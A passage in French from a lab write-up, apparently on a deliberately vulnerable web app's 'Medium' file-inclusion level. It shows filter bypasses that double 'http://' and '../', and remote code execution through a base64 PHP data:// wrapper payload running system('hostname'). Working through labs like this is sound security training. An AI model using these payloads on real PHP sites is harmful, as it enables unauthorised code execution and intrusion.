Niveau "Medium"
Sur ce niveau, il ne semble plus possible d'effectuer une RFI ainsi que d'utiliser la technique du path traversal (mais la LFI reste toujours possible) :

Après quelques essais j'identifie l'utilisation d'un filtrage des patterns http://
et https://
. Ce genre de filtrage est très souvent contournable car il est facile pour le développeur d'oublier un scénario. Il suffit par exemple ici de doubler le schéma désiré :
?page=hthttp://tp://www.google.fr

Le path traversal semble maintenant impossible à ce niveau :

Mais contournable avec la même technique de contournement de doublement (car le filtrage est sans doute effectué sur les occurrences ../
) :

L'utilisation de wrappers PHP reste tout de même possible :

Mais plus intéressant, l'exécution de code grâce au wrapper data://
fonctionne également (un autre wrapper bien dangereux comme il faut 😋) :
?page=data://text/plain;base64.PD9waHAgc3lzdGVtKCdob3N0bmFtZScpOyA/Pg==

La payload encodée en base64 étant la suivante :
<?php
system('hostname');
?>
Dernière mise à jour